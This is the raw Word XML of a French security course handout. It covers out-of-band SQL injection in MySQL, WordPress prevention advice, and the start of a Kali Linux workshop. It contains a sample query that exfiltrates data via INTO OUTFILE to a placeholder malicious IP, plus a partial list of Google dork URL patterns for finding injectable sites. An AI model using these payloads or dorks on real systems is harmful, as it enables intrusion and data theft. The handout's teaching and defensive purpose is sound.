    <w:p w14:paraId="03EA03E0" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A34B24" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8688B4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injection SQL Out-of-Band</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46375F6C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555479A4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Si un attaquant est incapable de rassembler les résultats d’une injection SQL par le même canal. Les techniques d’injection SQL Out-of-Band peuvent être utilisées comme alternative aux techniques d’injection SQL inférentielles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB6664" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A23CDB1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>En général, ces techniques consistent à envoyer des données de la base de données vers un endroit malveillant choisi par l’attaquant. Ce processus dépend aussi fortement des capacités du système de gestion de la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96BE17" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une attaque d’injection SQL Out-of-Band utilise une capacité de traitement de fichiers externe de votre DBMS. Dans MySQL, les fonctions LOAD_FILE() et INTO OUTFILE peuvent être utilisées pour demander à MySQL de transmettre les données à une source externe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44075A70" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Voici comment un attaquant peut utiliser OUTFILE pour envoyer les résultats d’une requête à une source externe :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69254B9C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="56D2801B" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>post_table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64895CE1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:spacing w:line="432" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'\\\\MALICIOUS_IP_ADDRESS\location'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD121D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="646C8500" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>De même, la fonction LOAD_FILE() peut être utilisée pour lire un fichier sur le serveur et afficher son contenu. Une combinaison de LOAD_FILE() et OUTFILE peut être utilisée pour lire le contenu d’un fichier sur le serveur et le transmettre ensuite à un autre emplacement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237401F" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00BE0517" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA3A70D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853466">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Prévention de SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C63A1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="76970362" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Pour atténuer la vulnérabilité de l’injection SQL dans votre Thème ou extension WordPress, la seule règle que vous devez suivre est de toujours utiliser les fonctions WordPress existantes lors de l’interaction avec la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69B606" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="6478BB8D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Ces fonctions sont minutieusement testées pour les vulnérabilités d’injection SQL pendant le processus de développement de WordPress. Par exemple, si vous souhaitez ajouter un commentaire à un article, utilisez la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp_insert_comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plutôt que d’insérer des données directement dans la table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp_comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFF2FB" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="0CD94A19" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Bien que les fonctions soient extensibles, vous pouvez occasionnellement avoir besoin d’exécuter une requête complexe. Dans un tel cas, assurez-vous d’utiliser le groupe de fonctions </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Vous pouvez utiliser </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wpdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prepare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour échapper les entrées de l’utilisateur avant de créer la requête.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC5C6E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="1A72960B" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">De plus, voici une liste de fonctions permettant de sanitiser les données dans WordPress. Ceux-ci vous permettent d’échapper à des types spécifiques d’entrées utilisateur comme les </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e-mails</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et les URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2F2AC" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="5B547FAF" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00CD3F10" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3F10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Sécurisez votre site WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B33630" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Alors que WordPress lui-même est sécurisé, des problèmes tels que des logiciels de base obsolètes, et les extensions nulled peuvent conduire à des vulnérabilités. Bien qu’il n’y ait pas d’alternative à ce que vous vérifiez votre site WordPress pour la vulnérabilité de l’injection SQL de manière approfondie, la complexité d’un site web peut rendre cette tâche difficile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32B292" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="3CF94A6E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vous pouvez utiliser un outil de scan en ligne tel que </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ThreatPass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPScan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vous pouvez auditer vos extensions pour voir si leur développement est bloqué. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A92B10" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Si elles ont été abandonnées il y a quelque temps, ce n’est peut-être pas une bonne idée de les utiliser sur votre site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5DB21" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="0314646C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4EDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Atelier : Mise en scène &amp; pratique sur Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D3836" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53423334" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4EDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Dorks :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB33C97" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50283982" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Dans SQL Injection, les attaquants modifient les requêtes SQL et injectent du code malveillant en exploitant les vulnérabilités des applications, en modifiant les informations de la base de données, en accédant à des données sensibles, et peuvent émettre des commandes au système. L’injection SQL est actuellement classée #1 sur le Top 10 de </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4EDC">
        <w:t>l’OWASP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32330319" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Avec Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, vous pouvez localiser des vulnérabilités spécifiques dans n’importe quelle application Web et trouver des pages de connexion, des dossiers privés, un accès au serveur et des informations de connexion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AABDF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>La divulgation de données, les enregistrements de base de données de falsification, l’escalade des privilèges, l’usurpation d’identité et les attaques DOS sont quelques-unes des menaces d’injection SQL les plus courantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36708964" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16539314"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view_items.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E2043"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home.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D687472"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item_book.php?CAT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48058B"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35096DF4"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schule</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termine.php?view</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CBF5EB"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goods_detail.php?data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA60EC4"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storemanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/contents/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>item.php?page_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4991393D"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lastRenderedPageBreak/>
        <w:t>view_items.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DB04D"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customer</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board.htm?mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
